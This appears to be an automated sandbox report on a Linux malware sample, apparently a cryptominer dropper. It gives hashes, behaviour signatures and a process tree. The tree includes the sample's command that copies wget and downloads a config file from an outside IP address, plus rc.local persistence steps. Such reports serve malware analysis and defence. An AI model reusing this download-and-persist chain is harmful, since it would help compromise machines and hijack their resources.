Analysis

  • max time kernel
    132s
  • max time network
    151s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240226-en
  • resource tags

    arch:amd64, arch:i386, image:ubuntu1804-amd64-20240226-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system
  • submitted
    09/04/2024, 17:01

General

  • Target

    ea79e6f3a96671aa051f677679c2bda0_JaffaCakes118

  • Size

    2KB

  • MD5

    ea79e6f3a96671aa051f677679c2bda0

  • SHA1

    2e2f085e81e8e750da43d8217541404ab78461e9

  • SHA256

    f60d0a378a482bde674b1e5d610bd8d3926468f59ced75e4d29776d14fa4c543

  • SHA512

    ce1a0f0c3c233a3bfa2724961e9f0f4ae2b061a60560ec37f0acfabad931c6a5a13ae2477d363e855f586fb5e097d5a33c464e57fb8ab06641ac67afcff58fce

Score
7/10

Malware Config

Signatures

  • Executes dropped EXE 1 IoCs
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Modifies rc script 1 TTPs 1 IoCs

    Adding/modifying system rc scripts is a common persistence mechanism.

  • Reads CPU attributes 1 TTPs 1 IoCs
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/ea79e6f3a96671aa051f677679c2bda0_JaffaCakes118
    /tmp/ea79e6f3a96671aa051f677679c2bda0_JaffaCakes118
    1⤵
    • Modifies rc script
    PID:1559
    • /bin/cp
      cp /usr/bin/wget .
      2⤵
      • Writes file to tmp directory
      PID:1569
    • /bin/chmod
      chmod +x wget
      2⤵
      PID:1570
    • /tmp/wget
      ./wget -P /tmp/ http://103.45.185.68:6358/config.json
      2⤵
      • Executes dropped EXE
      PID:1571
  • /bin/grep
    grep -v grep
    1⤵
    PID:1563
  • /bin/grep
    grep /etc/mlwk.sh
    1⤵
    PID:1562
  • /bin/cat
    cat /etc/rc.local
    1⤵
    PID:1561
  • /usr/bin/wc
    wc -l
    1⤵
    PID:1568
  • /bin/grep
    grep -v grep
    1⤵
    PID:1567
  • /bin/grep
    grep /tmp/xmrig
    1⤵
    PID:1566
  • /bin/ps
    ps aux
    1⤵
    • Reads CPU attributes
    • Reads runtime system information
    PID:1565

Network

MITRE ATT&CK Enterprise v15

Downloads

  • /etc/rc.local
    Filesize: 18B
    MD5: 2e5bcdd3b23224ecae22093a9349b20a
    SHA1: b4a63c6da233638e105eb63db7c2bf6dcf9b11c3
    SHA256: 4157be04ebab2c4aa0df84f890df6062723225e8dc19cabc475f4febc5c8a77d
    SHA512: c40cd9dad61486ab872ed7d05bbdfd7ac55d22c8b12e113aa84b9ee664d5744c40807d9b7bd7390e4c570874418bdcc14695017fbffb5dabeaf58dd60ce66af7

  • /tmp/wget
    Filesize: 487KB
    MD5: c3d53e47e50f2f61016331da435b3764
    SHA1: 96b8ea5f95dcce5781a673bc9effe1bdb8e1756d
    SHA256: 0f2b21e911bd10d795a110af7901d7860228f63cf14594ecbfb397e66000b4ae
    SHA512: 790cf336231b7c7bb24037f62326643df1c030314085957d8bc06a4217395b49f49e50f9a503652ad2650f2cab642bd98bd34fd4df4ab8f02becaf262d2c148a